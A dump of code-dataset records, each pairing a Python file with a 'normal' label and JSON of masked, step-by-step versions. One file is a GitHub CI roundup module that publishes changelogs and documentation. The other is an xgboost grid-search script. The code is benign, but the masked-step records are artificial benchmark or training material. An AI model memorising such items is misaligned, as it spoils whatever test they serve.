# 😮 TODO: There's a race here. This code is looking for the *latest* release, which
# we assume was made by the earlier ``StepName.githubRelease`` step. It's possible someone
# could create another release in between these steps! It'd be better if we fetched the
# release being worked on directly.
tmpFileName = None
try:
release = repo.releases().next() # ← here
# Make a ZIP archive of the docs
fd, tmpFileName = tempfile.mkstemp('.zip')
with zipfile.ZipFile(os.fdopen(fd, 'wb'), 'w') as zf:
for folder, subdirs, filenames in os.walk(self.getDocDir()):
for fn in filenames:
path = os.path.join(folder, fn)
# Avoid things like Unix-domain sockets if they just happen to appear:
if os.path.isfile(path):
zf.write(path, path[len(self.getDocDir()) + 1:])
# Remove any existing ``documentation.zip``
for asset in release.assets():
if asset.name == 'documentation.zip':
asset.delete()
break
# Add the new ZIP file as a downloadable asset
with open(tmpFileName, 'rb') as tmpFile:
release.upload_asset('application/zip', 'documentation.zip', tmpFile, 'Documentation (zip)')
except StopIteration:
_logger.info('🧐 No releases found at all, so I cannot publish documentation assets to them')
return
finally:
if tmpFileName is not None: os.remove(tmpFileName)
|
normal
|
{
"blob_id": "21e86e4719cda5c40f780aca6e56eb13c8c9b8e5",
"index": 988,
"step-1": "<mask token>\n\n\nclass StepName(Enum):\n <mask token>\n null = 'null'\n unitTest = 'unitTest'\n integrationTest = 'integrationTest'\n changeLog = 'changeLog'\n requirements = 'requirements'\n docs = 'docs'\n build = 'build'\n githubRelease = 'githubRelease'\n artifactPublication = 'artifactPublication'\n docPublication = 'docPublication'\n\n\nclass NullStep(Step):\n \"\"\"This is a \"null\" or \"no-op\" step that does nothing.\"\"\"\n\n def execute(self):\n pass\n\n\nclass ChangeLogStep(Step):\n \"\"\"This step generates a PDS-style changelog\"\"\"\n _sections = (\n '{\"improvements\":{\"prefix\":\"**Improvements:**\",\"labels\":[\"Epic\"]},\"defects\":{\"prefix\":\"**Defects:**\",\"labels\":[\"bug\"]},\"deprecations\":{\"prefix\":\"**Deprecations:**\",\"labels\":[\"deprecation\"]}}'\n )\n\n def execute(self):\n token = self.getToken()\n if not token:\n _logger.info(\n '🤷\\u200d♀️ No GitHub administrative token; cannot generate changelog'\n )\n return\n invoke(['github_changelog_generator', '--user', self.getOwner(),\n '--project', self.getRepository(), '--output', 'CHANGELOG.md',\n '--token', token, '--configure-sections', self._sections,\n '--no-pull-requests', '--issues-label',\n '**Other closed issues:**', '--issue-line-labels',\n 'high,low,medium'])\n commit('CHANGELOG.md', 'Update changelog')\n\n\nclass RequirementsStep(Step):\n \"\"\"This step generates a PDS-style requirements file\"\"\"\n\n def execute(self):\n token = self.getToken()\n if not token:\n _logger.info(\n '🤷\\u200d♀️ No GitHub administrative token; cannot generate requirements'\n )\n return\n argv = ['requirement-report', '--format', 'md', '--organization',\n self.getOwner(), '--repository', self.getRepository(),\n '--output', 'docs/requirements/', '--token', token]\n if not self.assembly.isStable():\n argv.append('--dev')\n generatedFile = invoke(argv).strip()\n if not generatedFile:\n _logger.warn(\n '🤨 Did not get a requirements file from the requirement-report; will skip it'\n )\n return\n commit(generatedFile, 'Update requirements')\n\n\nclass DocPublicationStep(Step):\n\n def getDocDir(self):\n raise NotImplementedError('Subclasses must implement ``getDocDir``')\n\n def execute(self):\n token = self.getToken()\n if not token:\n _logger.info(\n '🤷\\u200d♀️ No GitHub administrative token; cannot send doc artifacts to GitHub'\n )\n return\n github = github3.login(token=token)\n repo = github.repository(self.getOwner(), self.getRepository())\n tmpFileName = None\n try:\n release = repo.releases().next()\n fd, tmpFileName = tempfile.mkstemp('.zip')\n with zipfile.ZipFile(os.fdopen(fd, 'wb'), 'w') as zf:\n for folder, subdirs, filenames in os.walk(self.getDocDir()):\n for fn in filenames:\n path = os.path.join(folder, fn)\n if os.path.isfile(path):\n zf.write(path, path[len(self.getDocDir()) + 1:])\n for asset in release.assets():\n if asset.name == 'documentation.zip':\n asset.delete()\n break\n with open(tmpFileName, 'rb') as tmpFile:\n release.upload_asset('application/zip', 'documentation.zip',\n tmpFile, 'Documentation (zip)')\n except StopIteration:\n _logger.info(\n '🧐 No releases found at all, so I cannot publish documentation assets to them'\n )\n return\n finally:\n if tmpFileName is not None:\n os.remove(tmpFileName)\n",
"step-2": "<mask token>\n\n\nclass Step(object):\n <mask token>\n\n def __init__(self, assembly):\n \"\"\"Initialize a step with the given ``assembly``\"\"\"\n self.assembly = assembly\n\n def __repr__(self):\n return f'<{self.__class__.__name__}()>'\n\n def execute(self):\n raise NotImplementedError('Subclasses must implement ``execute``')\n <mask token>\n <mask token>\n <mask token>\n\n\nclass StepName(Enum):\n \"\"\"Enumerated identifiers for each of the possible steps of a roundup\"\"\"\n null = 'null'\n unitTest = 'unitTest'\n integrationTest = 'integrationTest'\n changeLog = 'changeLog'\n requirements = 'requirements'\n docs = 'docs'\n build = 'build'\n githubRelease = 'githubRelease'\n artifactPublication = 'artifactPublication'\n docPublication = 'docPublication'\n\n\nclass NullStep(Step):\n \"\"\"This is a \"null\" or \"no-op\" step that does nothing.\"\"\"\n\n def execute(self):\n pass\n\n\nclass ChangeLogStep(Step):\n \"\"\"This step generates a PDS-style changelog\"\"\"\n _sections = (\n '{\"improvements\":{\"prefix\":\"**Improvements:**\",\"labels\":[\"Epic\"]},\"defects\":{\"prefix\":\"**Defects:**\",\"labels\":[\"bug\"]},\"deprecations\":{\"prefix\":\"**Deprecations:**\",\"labels\":[\"deprecation\"]}}'\n )\n\n def execute(self):\n token = self.getToken()\n if not token:\n _logger.info(\n '🤷\\u200d♀️ No GitHub administrative token; cannot generate changelog'\n )\n return\n invoke(['github_changelog_generator', '--user', self.getOwner(),\n '--project', self.getRepository(), '--output', 'CHANGELOG.md',\n '--token', token, '--configure-sections', self._sections,\n '--no-pull-requests', '--issues-label',\n '**Other closed issues:**', '--issue-line-labels',\n 'high,low,medium'])\n commit('CHANGELOG.md', 'Update changelog')\n\n\nclass RequirementsStep(Step):\n \"\"\"This step generates a PDS-style requirements file\"\"\"\n\n def execute(self):\n token = self.getToken()\n if not token:\n _logger.info(\n '🤷\\u200d♀️ No GitHub administrative token; cannot generate requirements'\n )\n return\n argv = ['requirement-report', '--format', 'md', '--organization',\n self.getOwner(), '--repository', self.getRepository(),\n '--output', 'docs/requirements/', '--token', token]\n if not self.assembly.isStable():\n argv.append('--dev')\n generatedFile = invoke(argv).strip()\n if not generatedFile:\n _logger.warn(\n '🤨 Did not get a requirements file from the requirement-report; will skip it'\n )\n return\n commit(generatedFile, 'Update requirements')\n\n\nclass DocPublicationStep(Step):\n\n def getDocDir(self):\n raise NotImplementedError('Subclasses must implement ``getDocDir``')\n\n def execute(self):\n token = self.getToken()\n if not token:\n _logger.info(\n '🤷\\u200d♀️ No GitHub administrative token; cannot send doc artifacts to GitHub'\n )\n return\n github = github3.login(token=token)\n repo = github.repository(self.getOwner(), self.getRepository())\n tmpFileName = None\n try:\n release = repo.releases().next()\n fd, tmpFileName = tempfile.mkstemp('.zip')\n with zipfile.ZipFile(os.fdopen(fd, 'wb'), 'w') as zf:\n for folder, subdirs, filenames in os.walk(self.getDocDir()):\n for fn in filenames:\n path = os.path.join(folder, fn)\n if os.path.isfile(path):\n zf.write(path, path[len(self.getDocDir()) + 1:])\n for asset in release.assets():\n if asset.name == 'documentation.zip':\n asset.delete()\n break\n with open(tmpFileName, 'rb') as tmpFile:\n release.upload_asset('application/zip', 'documentation.zip',\n tmpFile, 'Documentation (zip)')\n except StopIteration:\n _logger.info(\n '🧐 No 
releases found at all, so I cannot publish documentation assets to them'\n )\n return\n finally:\n if tmpFileName is not None:\n os.remove(tmpFileName)\n",
"step-3": "<mask token>\n\n\nclass Step(object):\n <mask token>\n\n def __init__(self, assembly):\n \"\"\"Initialize a step with the given ``assembly``\"\"\"\n self.assembly = assembly\n\n def __repr__(self):\n return f'<{self.__class__.__name__}()>'\n\n def execute(self):\n raise NotImplementedError('Subclasses must implement ``execute``')\n\n def getRepository(self):\n \"\"\"Utility: get the name of the GitHub repository\"\"\"\n return self.assembly.context.environ.get('GITHUB_REPOSITORY').split('/'\n )[1]\n <mask token>\n <mask token>\n\n\nclass StepName(Enum):\n \"\"\"Enumerated identifiers for each of the possible steps of a roundup\"\"\"\n null = 'null'\n unitTest = 'unitTest'\n integrationTest = 'integrationTest'\n changeLog = 'changeLog'\n requirements = 'requirements'\n docs = 'docs'\n build = 'build'\n githubRelease = 'githubRelease'\n artifactPublication = 'artifactPublication'\n docPublication = 'docPublication'\n\n\nclass NullStep(Step):\n \"\"\"This is a \"null\" or \"no-op\" step that does nothing.\"\"\"\n\n def execute(self):\n pass\n\n\nclass ChangeLogStep(Step):\n \"\"\"This step generates a PDS-style changelog\"\"\"\n _sections = (\n '{\"improvements\":{\"prefix\":\"**Improvements:**\",\"labels\":[\"Epic\"]},\"defects\":{\"prefix\":\"**Defects:**\",\"labels\":[\"bug\"]},\"deprecations\":{\"prefix\":\"**Deprecations:**\",\"labels\":[\"deprecation\"]}}'\n )\n\n def execute(self):\n token = self.getToken()\n if not token:\n _logger.info(\n '🤷\\u200d♀️ No GitHub administrative token; cannot generate changelog'\n )\n return\n invoke(['github_changelog_generator', '--user', self.getOwner(),\n '--project', self.getRepository(), '--output', 'CHANGELOG.md',\n '--token', token, '--configure-sections', self._sections,\n '--no-pull-requests', '--issues-label',\n '**Other closed issues:**', '--issue-line-labels',\n 'high,low,medium'])\n commit('CHANGELOG.md', 'Update changelog')\n\n\nclass RequirementsStep(Step):\n \"\"\"This step generates a PDS-style requirements file\"\"\"\n\n def execute(self):\n token = self.getToken()\n if not token:\n _logger.info(\n '🤷\\u200d♀️ No GitHub administrative token; cannot generate requirements'\n )\n return\n argv = ['requirement-report', '--format', 'md', '--organization',\n self.getOwner(), '--repository', self.getRepository(),\n '--output', 'docs/requirements/', '--token', token]\n if not self.assembly.isStable():\n argv.append('--dev')\n generatedFile = invoke(argv).strip()\n if not generatedFile:\n _logger.warn(\n '🤨 Did not get a requirements file from the requirement-report; will skip it'\n )\n return\n commit(generatedFile, 'Update requirements')\n\n\nclass DocPublicationStep(Step):\n\n def getDocDir(self):\n raise NotImplementedError('Subclasses must implement ``getDocDir``')\n\n def execute(self):\n token = self.getToken()\n if not token:\n _logger.info(\n '🤷\\u200d♀️ No GitHub administrative token; cannot send doc artifacts to GitHub'\n )\n return\n github = github3.login(token=token)\n repo = github.repository(self.getOwner(), self.getRepository())\n tmpFileName = None\n try:\n release = repo.releases().next()\n fd, tmpFileName = tempfile.mkstemp('.zip')\n with zipfile.ZipFile(os.fdopen(fd, 'wb'), 'w') as zf:\n for folder, subdirs, filenames in os.walk(self.getDocDir()):\n for fn in filenames:\n path = os.path.join(folder, fn)\n if os.path.isfile(path):\n zf.write(path, path[len(self.getDocDir()) + 1:])\n for asset in release.assets():\n if asset.name == 'documentation.zip':\n asset.delete()\n break\n with open(tmpFileName, 'rb') as 
tmpFile:\n release.upload_asset('application/zip', 'documentation.zip',\n tmpFile, 'Documentation (zip)')\n except StopIteration:\n _logger.info(\n '🧐 No releases found at all, so I cannot publish documentation assets to them'\n )\n return\n finally:\n if tmpFileName is not None:\n os.remove(tmpFileName)\n",
"step-4": "<mask token>\n_logger = logging.getLogger(__name__)\n\n\nclass Step(object):\n \"\"\"An abstract step; executing steps comprises a roundup\"\"\"\n\n def __init__(self, assembly):\n \"\"\"Initialize a step with the given ``assembly``\"\"\"\n self.assembly = assembly\n\n def __repr__(self):\n return f'<{self.__class__.__name__}()>'\n\n def execute(self):\n raise NotImplementedError('Subclasses must implement ``execute``')\n\n def getRepository(self):\n \"\"\"Utility: get the name of the GitHub repository\"\"\"\n return self.assembly.context.environ.get('GITHUB_REPOSITORY').split('/'\n )[1]\n\n def getToken(self):\n \"\"\"Utility: get the administrative GitHub token\"\"\"\n return self.assembly.context.environ.get('ADMIN_GITHUB_TOKEN')\n\n def getOwner(self):\n \"\"\"Utility: return the owning user/organization of the repository in use\"\"\"\n return self.assembly.context.environ.get('GITHUB_REPOSITORY').split('/'\n )[0]\n\n\nclass StepName(Enum):\n \"\"\"Enumerated identifiers for each of the possible steps of a roundup\"\"\"\n null = 'null'\n unitTest = 'unitTest'\n integrationTest = 'integrationTest'\n changeLog = 'changeLog'\n requirements = 'requirements'\n docs = 'docs'\n build = 'build'\n githubRelease = 'githubRelease'\n artifactPublication = 'artifactPublication'\n docPublication = 'docPublication'\n\n\nclass NullStep(Step):\n \"\"\"This is a \"null\" or \"no-op\" step that does nothing.\"\"\"\n\n def execute(self):\n pass\n\n\nclass ChangeLogStep(Step):\n \"\"\"This step generates a PDS-style changelog\"\"\"\n _sections = (\n '{\"improvements\":{\"prefix\":\"**Improvements:**\",\"labels\":[\"Epic\"]},\"defects\":{\"prefix\":\"**Defects:**\",\"labels\":[\"bug\"]},\"deprecations\":{\"prefix\":\"**Deprecations:**\",\"labels\":[\"deprecation\"]}}'\n )\n\n def execute(self):\n token = self.getToken()\n if not token:\n _logger.info(\n '🤷\\u200d♀️ No GitHub administrative token; cannot generate changelog'\n )\n return\n invoke(['github_changelog_generator', '--user', self.getOwner(),\n '--project', self.getRepository(), '--output', 'CHANGELOG.md',\n '--token', token, '--configure-sections', self._sections,\n '--no-pull-requests', '--issues-label',\n '**Other closed issues:**', '--issue-line-labels',\n 'high,low,medium'])\n commit('CHANGELOG.md', 'Update changelog')\n\n\nclass RequirementsStep(Step):\n \"\"\"This step generates a PDS-style requirements file\"\"\"\n\n def execute(self):\n token = self.getToken()\n if not token:\n _logger.info(\n '🤷\\u200d♀️ No GitHub administrative token; cannot generate requirements'\n )\n return\n argv = ['requirement-report', '--format', 'md', '--organization',\n self.getOwner(), '--repository', self.getRepository(),\n '--output', 'docs/requirements/', '--token', token]\n if not self.assembly.isStable():\n argv.append('--dev')\n generatedFile = invoke(argv).strip()\n if not generatedFile:\n _logger.warn(\n '🤨 Did not get a requirements file from the requirement-report; will skip it'\n )\n return\n commit(generatedFile, 'Update requirements')\n\n\nclass DocPublicationStep(Step):\n\n def getDocDir(self):\n raise NotImplementedError('Subclasses must implement ``getDocDir``')\n\n def execute(self):\n token = self.getToken()\n if not token:\n _logger.info(\n '🤷\\u200d♀️ No GitHub administrative token; cannot send doc artifacts to GitHub'\n )\n return\n github = github3.login(token=token)\n repo = github.repository(self.getOwner(), self.getRepository())\n tmpFileName = None\n try:\n release = repo.releases().next()\n fd, tmpFileName = 
tempfile.mkstemp('.zip')\n with zipfile.ZipFile(os.fdopen(fd, 'wb'), 'w') as zf:\n for folder, subdirs, filenames in os.walk(self.getDocDir()):\n for fn in filenames:\n path = os.path.join(folder, fn)\n if os.path.isfile(path):\n zf.write(path, path[len(self.getDocDir()) + 1:])\n for asset in release.assets():\n if asset.name == 'documentation.zip':\n asset.delete()\n break\n with open(tmpFileName, 'rb') as tmpFile:\n release.upload_asset('application/zip', 'documentation.zip',\n tmpFile, 'Documentation (zip)')\n except StopIteration:\n _logger.info(\n '🧐 No releases found at all, so I cannot publish documentation assets to them'\n )\n return\n finally:\n if tmpFileName is not None:\n os.remove(tmpFileName)\n",
"step-5": "# encoding: utf-8\n\n'''🤠 PDS Roundup: A step takes you further towards a complete roundup'''\n\nfrom enum import Enum\nfrom .util import commit, invoke\nimport logging, github3, tempfile, zipfile, os\n\n_logger = logging.getLogger(__name__)\n\n\nclass Step(object):\n '''An abstract step; executing steps comprises a roundup'''\n def __init__(self, assembly):\n '''Initialize a step with the given ``assembly``'''\n self.assembly = assembly\n\n def __repr__(self):\n return f'<{self.__class__.__name__}()>'\n\n def execute(self):\n raise NotImplementedError('Subclasses must implement ``execute``')\n\n def getRepository(self):\n '''Utility: get the name of the GitHub repository'''\n return self.assembly.context.environ.get('GITHUB_REPOSITORY').split('/')[1]\n\n def getToken(self):\n '''Utility: get the administrative GitHub token'''\n return self.assembly.context.environ.get('ADMIN_GITHUB_TOKEN')\n\n def getOwner(self):\n '''Utility: return the owning user/organization of the repository in use'''\n return self.assembly.context.environ.get('GITHUB_REPOSITORY').split('/')[0]\n\n\nclass StepName(Enum):\n '''Enumerated identifiers for each of the possible steps of a roundup'''\n null = 'null'\n unitTest = 'unitTest'\n integrationTest = 'integrationTest'\n changeLog = 'changeLog'\n requirements = 'requirements'\n docs = 'docs'\n build = 'build'\n githubRelease = 'githubRelease'\n artifactPublication = 'artifactPublication'\n docPublication = 'docPublication'\n\n\n# Common Steps\n# ============\n#\n# The folowing are concrete Step classes that are shared between contexts;\n# i.e., they're independent of Python, Maven, etc.\n\n\nclass NullStep(Step):\n '''This is a \"null\" or \"no-op\" step that does nothing.'''\n def execute(self):\n pass\n # But for development, this sure is handy:\n # import pdb;pdb.set_trace()\n # import subprocess\n # subprocess.run('/bin/sh')\n\n\nclass ChangeLogStep(Step):\n '''This step generates a PDS-style changelog'''\n _sections = '{\"improvements\":{\"prefix\":\"**Improvements:**\",\"labels\":[\"Epic\"]},\"defects\":{\"prefix\":\"**Defects:**\",\"labels\":[\"bug\"]},\"deprecations\":{\"prefix\":\"**Deprecations:**\",\"labels\":[\"deprecation\"]}}'\n\n def execute(self):\n token = self.getToken()\n if not token:\n _logger.info('🤷♀️ No GitHub administrative token; cannot generate changelog')\n return\n invoke([\n 'github_changelog_generator',\n '--user',\n self.getOwner(),\n '--project',\n self.getRepository(),\n '--output',\n 'CHANGELOG.md',\n '--token',\n token,\n '--configure-sections',\n self._sections,\n '--no-pull-requests',\n '--issues-label',\n '**Other closed issues:**',\n '--issue-line-labels',\n 'high,low,medium'\n ])\n commit('CHANGELOG.md', 'Update changelog')\n\n\nclass RequirementsStep(Step):\n '''This step generates a PDS-style requirements file'''\n def execute(self):\n token = self.getToken()\n if not token:\n _logger.info('🤷♀️ No GitHub administrative token; cannot generate requirements')\n return\n argv = [\n 'requirement-report',\n '--format',\n 'md',\n '--organization',\n self.getOwner(),\n '--repository',\n self.getRepository(),\n '--output',\n 'docs/requirements/',\n '--token',\n token\n ]\n if not self.assembly.isStable():\n argv.append('--dev')\n generatedFile = invoke(argv).strip()\n if not generatedFile:\n _logger.warn('🤨 Did not get a requirements file from the requirement-report; will skip it')\n return\n commit(generatedFile, 'Update requirements')\n\n\nclass DocPublicationStep(Step):\n def getDocDir(self):\n raise 
NotImplementedError('Subclasses must implement ``getDocDir``')\n def execute(self):\n token = self.getToken()\n if not token:\n _logger.info('🤷♀️ No GitHub administrative token; cannot send doc artifacts to GitHub')\n return\n github = github3.login(token=token)\n repo = github.repository(self.getOwner(), self.getRepository())\n\n # 😮 TODO: There's a race here. This code is looking for the *latest* release, which\n # we assume was made by the earlier ``StepName.githubRelease`` step. It's possible someone\n # could create another release in between these steps! It'd be better if we fetched the\n # release being worked on directly.\n tmpFileName = None\n try:\n release = repo.releases().next() # ← here\n\n # Make a ZIP archive of the docs\n fd, tmpFileName = tempfile.mkstemp('.zip')\n with zipfile.ZipFile(os.fdopen(fd, 'wb'), 'w') as zf:\n for folder, subdirs, filenames in os.walk(self.getDocDir()):\n for fn in filenames:\n path = os.path.join(folder, fn)\n # Avoid things like Unix-domain sockets if they just happen to appear:\n if os.path.isfile(path):\n zf.write(path, path[len(self.getDocDir()) + 1:])\n\n # Remove any existing ``documentation.zip``\n for asset in release.assets():\n if asset.name == 'documentation.zip':\n asset.delete()\n break\n\n # Add the new ZIP file as a downloadable asset\n with open(tmpFileName, 'rb') as tmpFile:\n release.upload_asset('application/zip', 'documentation.zip', tmpFile, 'Documentation (zip)')\n\n except StopIteration:\n _logger.info('🧐 No releases found at all, so I cannot publish documentation assets to them')\n return\n finally:\n if tmpFileName is not None: os.remove(tmpFileName)\n",
"step-ids": [
15,
20,
21,
25,
27
]
}
|
[
15,
20,
21,
25,
27
] |
import numpy as np
import xgboost as xgb
from sklearn.grid_search import GridSearchCV  # legacy (pre-0.20 scikit-learn) grid-search module; kept because the code below reads gs_clf.grid_scores_
import generateVector
from sklearn.model_selection import GroupKFold
from sklearn import preprocessing as pr
positiveFile="../dataset/full_data/positive.csv"
negativeFile="../dataset/full_data/negative.csv"
neutralFile="../dataset/full_data/neutral.csv"
X_model, Y_model = generateVector.loadMatrix(positiveFile, neutralFile, negativeFile, '2', '0', '-2')
X_model_scaled = pr.scale(X_model)
X_model_normalized = pr.normalize(X_model_scaled, norm='l2') # l2 norm
X_model = X_model_normalized
X_model = X_model.tolist()
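# Assign each sample a group label (0 or 2; roughly 2/3 vs 1/3 of the data) so GroupKFold(n_splits=2) below produces two fixed folds, each holding out one group.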
testFold = []
for i in range(1, len(X_model) + 1):
if (i % 3 == 1) | (i % 3 == 2):
testFold.append(0)
else:
testFold.append(2)
#ps = PredefinedSplit(test_fold=testFold)
gkf = list(GroupKFold(n_splits=2).split(X_model, Y_model, testFold))
def param_Test1():
global X_model,Y_model,gkf
param_grid = {
'max_depth': [2,4,6,8,10],
'min_child_weight':[1,3,5,7],
# 'gamma':[i/10.0 for i in range(0,5)],
# 'subsample': [i / 10.0 for i in range(6, 10)],
# 'colsample_bytree': [i / 10.0 for i in range(6, 10)],
# 'reg_alpha': [1e-5, 1e-2, 0.1, 1, 100],
'n_estimators': [100]}
xgbclf = xgb.XGBClassifier(silent=0,objective="multi:softmax",learning_rate=0.1)
# Run Grid Search process
gs_clf = GridSearchCV(xgbclf, param_grid,n_jobs=-1,scoring='f1_weighted',cv=gkf)
gs_clf.fit(np.asarray(X_model), Y_model)
    print(gs_clf.best_params_, gs_clf.best_score_)
    print(gs_clf.grid_scores_, gs_clf.best_params_, gs_clf.best_score_)
best_parameters, score, _ = max(gs_clf.grid_scores_, key=lambda x: x[1])
print('score:', score)
for param_name in sorted(best_parameters.keys()):
print('%s: %r' % (param_name, best_parameters[param_name]))
#param_Test1()
#{'n_estimators': 100, 'max_depth': 4, 'min_child_weight': 3} 0.767260190997
def param_test2():
global X_model, Y_model, gkf
param_grid = {
'max_depth': [5,6,7],
'min_child_weight':[2,3,4],
# 'gamma':[i/10.0 for i in range(0,5)],
# 'subsample': [i / 10.0 for i in range(6, 10)],
# 'colsample_bytree': [i / 10.0 for i in range(6, 10)],
# 'reg_alpha': [1e-5, 1e-2, 0.1, 1, 100],
'n_estimators': [100]}
xgbclf = xgb.XGBClassifier(silent=0,objective="multi:softmax")
# Run Grid Search process
gs_clf = GridSearchCV(xgbclf, param_grid,
n_jobs=1,
scoring='f1_weighted',cv=gkf)
gs_clf.fit(np.asarray(X_model), Y_model)
    print(gs_clf.grid_scores_, gs_clf.best_params_, gs_clf.best_score_)
best_parameters, score, _ = max(gs_clf.grid_scores_, key=lambda x: x[1])
print('score:', score)
for param_name in sorted(best_parameters.keys()):
print('%s: %r' % (param_name, best_parameters[param_name]))
#param_test2()
def paramTest2a():
global X_model, Y_model, gkf
param_grid = {
#'max_depth': [5, 6, 7],
#'learning_rate': [0.1, 0.15, 0.2, 0.3],
#'min_child_weight':[1,3,5,7],
# 'gamma':[i/10.0 for i in range(0,5)],
'subsample': [i / 10.0 for i in range(6, 10)],
'colsample_bytree': [i / 10.0 for i in range(6, 10)],
# 'reg_alpha': [1e-5, 1e-2, 0.1, 1, 100],
'n_estimators': [100]}
xgbclf = xgb.XGBClassifier(max_depth=5,min_child_weight=2,silent=0,learning_rate=0.1,objective="multi:softmax")
gs_clf = GridSearchCV(xgbclf, param_grid,
n_jobs=1,
scoring='f1_weighted',cv=gkf)
gs_clf.fit(np.asarray(X_model), Y_model)
    print(gs_clf.grid_scores_, gs_clf.best_params_, gs_clf.best_score_)
best_parameters, score, _ = max(gs_clf.grid_scores_, key=lambda x: x[1])
print('score:', score)
for param_name in sorted(best_parameters.keys()):
print('%s: %r' % (param_name, best_parameters[param_name]))
#paramTest2a()
def paramTest2b():
global X_model, Y_model, gkf
param_grid = {
#'max_depth': [5, 6, 7],
# 'learning_rate': [0.1, 0.15, 0.2, 0.3],
#'min_child_weight': [1, 3, 5, 7],
#'gamma':[i/10.0 for i in range(0,5)],
'subsample': [i / 10.0 for i in range(6, 10)],
'colsample_bytree': [i / 10.0 for i in range(6, 10)],
# 'reg_alpha': [1e-5, 1e-2, 0.1, 1, 100],
'n_estimators': [100]}
xgbclf = xgb.XGBClassifier(silent=0, objective="multi:softmax",learning_rate=0.1,max_depth=7,min_child_weight=7)
# Run Grid Search process
gs_clf = GridSearchCV(xgbclf, param_grid,
n_jobs=1,
scoring='f1_weighted',cv=gkf)
gs_clf.fit(np.asarray(X_model), Y_model)
    print(gs_clf.grid_scores_, gs_clf.best_params_, gs_clf.best_score_)
best_parameters, score, _ = max(gs_clf.grid_scores_, key=lambda x: x[1])
print('score:', score)
for param_name in sorted(best_parameters.keys()):
print('%s: %r' % (param_name, best_parameters[param_name]))
#paramTest2b()
def paramTest3():
global X_model, Y_model, gkf
param_grid = {
# 'max_depth': [5, 6, 7],
# 'learning_rate': [0.1, 0.15, 0.2, 0.3],
# 'min_child_weight': [1, 3, 5, 7],
'gamma':[i/10.0 for i in range(0,5)],
#'subsample': [i / 10.0 for i in range(6, 10)],
#'colsample_bytree': [i / 10.0 for i in range(6, 10)],
# 'reg_alpha': [1e-5, 1e-2, 0.1, 1, 100],
'n_estimators': [100]}
xgbclf = xgb.XGBClassifier(silent=0,objective="multi:softmax", learning_rate=0.1, max_depth=7, min_child_weight=7,
colsample_bytree=0.9,subsample=0.9)
# Run Grid Search process
gs_clf = GridSearchCV(xgbclf, param_grid,
n_jobs=1,
scoring='f1_weighted',cv=gkf)
gs_clf.fit(np.asarray(X_model), Y_model)
    print(gs_clf.grid_scores_, gs_clf.best_params_, gs_clf.best_score_)
best_parameters, score, _ = max(gs_clf.grid_scores_, key=lambda x: x[1])
print('score:', score)
for param_name in sorted(best_parameters.keys()):
print('%s: %r' % (param_name, best_parameters[param_name]))
#paramTest3()
def paramTest4a():
global X_model, Y_model,gkf
param_grid = {
# 'max_depth': [5, 6, 7],
# 'learning_rate': [0.1, 0.15, 0.2, 0.3],
# 'min_child_weight': [1, 3, 5, 7],
# 'gamma': [i / 10.0 for i in range(0, 5)],
# 'subsample': [i / 10.0 for i in range(6, 10)],
# 'colsample_bytree': [i / 10.0 for i in range(6, 10)],
'reg_alpha': [1e-5, 1e-2, 0.1, 1, 100],
'n_estimators': [100]}
xgbclf = xgb.XGBClassifier(silent=0, learning_rate=0.1, max_depth=7, min_child_weight=7,gamma=0.1,
colsample_bytree=0.8, subsample=0.6,objective="multi:softmax")
# Run Grid Search process
gs_clf = GridSearchCV(xgbclf, param_grid,
n_jobs=1,
scoring='f1_weighted',cv=gkf)
gs_clf.fit(np.asarray(X_model), Y_model)
    print(gs_clf.grid_scores_, gs_clf.best_params_, gs_clf.best_score_)
best_parameters, score, _ = max(gs_clf.grid_scores_, key=lambda x: x[1])
print('score:', score)
for param_name in sorted(best_parameters.keys()):
print('%s: %r' % (param_name, best_parameters[param_name]))
paramTest4a()
|
normal
|
{
"blob_id": "547844eca9eab097b814b0daa5da96d6a8ccee55",
"index": 5843,
"step-1": "import numpy as np\nimport xgboost as xgb\nfrom sklearn.grid_search import GridSearchCV #Performing grid search\nimport generateVector\nfrom sklearn.model_selection import GroupKFold\nfrom sklearn import preprocessing as pr\n\npositiveFile=\"../dataset/full_data/positive.csv\"\nnegativeFile=\"../dataset/full_data/negative.csv\"\nneutralFile=\"../dataset/full_data/neutral.csv\"\n\nX_model, Y_model = generateVector.loadMatrix(positiveFile, neutralFile, negativeFile, '2', '0', '-2')\nX_model_scaled = pr.scale(X_model)\nX_model_normalized = pr.normalize(X_model_scaled, norm='l2') # l2 norm\nX_model = X_model_normalized\nX_model = X_model.tolist()\n\ntestFold = []\nfor i in range(1, len(X_model) + 1):\n if (i % 3 == 1) | (i % 3 == 2):\n testFold.append(0)\n else:\n testFold.append(2)\n#ps = PredefinedSplit(test_fold=testFold)\ngkf = list(GroupKFold(n_splits=2).split(X_model, Y_model, testFold))\n\ndef param_Test1():\n global X_model,Y_model,gkf\n param_grid = {\n 'max_depth': [2,4,6,8,10],\n 'min_child_weight':[1,3,5,7],\n # 'gamma':[i/10.0 for i in range(0,5)],\n # 'subsample': [i / 10.0 for i in range(6, 10)],\n # 'colsample_bytree': [i / 10.0 for i in range(6, 10)],\n # 'reg_alpha': [1e-5, 1e-2, 0.1, 1, 100],\n 'n_estimators': [100]}\n xgbclf = xgb.XGBClassifier(silent=0,objective=\"multi:softmax\",learning_rate=0.1)\n\n # Run Grid Search process\n gs_clf = GridSearchCV(xgbclf, param_grid,n_jobs=-1,scoring='f1_weighted',cv=gkf)\n gs_clf.fit(np.asarray(X_model), Y_model)\n print gs_clf.best_params_,gs_clf.best_score_\n print gs_clf.grid_scores_, gs_clf.best_params_, gs_clf.best_score_\n best_parameters, score, _ = max(gs_clf.grid_scores_, key=lambda x: x[1])\n print('score:', score)\n for param_name in sorted(best_parameters.keys()):\n print('%s: %r' % (param_name, best_parameters[param_name]))\n\n#param_Test1()\n\n#{'n_estimators': 100, 'max_depth': 4, 'min_child_weight': 3} 0.767260190997\n\ndef param_test2():\n global X_model, Y_model, gkf\n param_grid = {\n 'max_depth': [5,6,7],\n 'min_child_weight':[2,3,4],\n # 'gamma':[i/10.0 for i in range(0,5)],\n # 'subsample': [i / 10.0 for i in range(6, 10)],\n # 'colsample_bytree': [i / 10.0 for i in range(6, 10)],\n # 'reg_alpha': [1e-5, 1e-2, 0.1, 1, 100],\n 'n_estimators': [100]}\n xgbclf = xgb.XGBClassifier(silent=0,objective=\"multi:softmax\")\n # Run Grid Search process\n\n gs_clf = GridSearchCV(xgbclf, param_grid,\n n_jobs=1,\n scoring='f1_weighted',cv=gkf)\n gs_clf.fit(np.asarray(X_model), Y_model)\n print gs_clf.grid_scores_, gs_clf.best_params_, gs_clf.best_score_\n best_parameters, score, _ = max(gs_clf.grid_scores_, key=lambda x: x[1])\n print('score:', score)\n for param_name in 